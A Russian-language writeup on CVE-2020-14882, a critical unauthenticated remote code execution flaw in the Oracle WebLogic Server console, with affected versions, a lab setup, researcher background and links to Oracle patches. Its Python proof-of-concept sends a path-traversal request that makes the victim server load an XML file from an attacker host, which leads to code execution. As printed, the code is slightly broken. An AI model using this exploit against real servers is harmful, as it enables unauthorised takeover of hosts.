
Takeover of Oracle WebLogic Server
CVE-2020-14882 — это ошибка удаленного выполнения кода (RCE) в компоненте Console Oracle WebLogic Server. Эта ошибка, не требующая аутентификации, получила оценку сложности атаки «низкая» и была отмечена Oracle как «легко эксплуатируемая», что привело к присвоению ей критического балла CVSSv3 9.8. Успешная эксплуатация позволила бы неаутентифицированному злоумышленнику скомпрометировать сервер Oracle WebLogic через HTTP и получить полный контроль над хостом. (Подробнее - Tenable)
Поддерживаемые версии, которые подвержены уязвимости: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 и 14.1.1.0.0.
Жертва (WebLogic Server): 192.168.0.15 - Windows 10 PRO, работающий под управлением WebLogic Server.
Атакующий (Хостинг XML-файла): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Полезная нагрузка:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Эта полезная нагрузка вызовет XML-библиотеку Spring Framework для отправки запроса на сервер в домене атакующего в поисках файла teste.xml.
28 октября исследователь безопасности по имени Jang опубликовал запись в блоге (на вьетнамском) о CVE-2020-14882, включая частичные детали, которые можно использовать для PoC. Jang не новичок в ошибках WebLogic: он известен обнаружением и сообщением об CVE-2020-2555 в Oracle, которая исправила уязвимость в своем CPU за январь 2020 года. В марте Jang подтвердил, что CVE-2020-2555 не была полностью исправлена. Обход для CVE-2020-2555 был раскрыт другим исследователем, Quynh Le из VNPT Information Security Center (ISC). И Le, и Jang указаны как сообщившие об этом обходе, который идентифицирован как CVE-2020-2883. (Подробнее - Tenable)
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Поддержка Oracle)
Oracle Critical Patch Update Advisory - October 2020. (Поддержка Oracle)
Как смягчить последствия CVE-2020-14882 WebLogic. (Поддержка Oracle)
Уязвимость в продукте Oracle WebLogic Server из Oracle Fusion Middleware. (Mitre - CVE)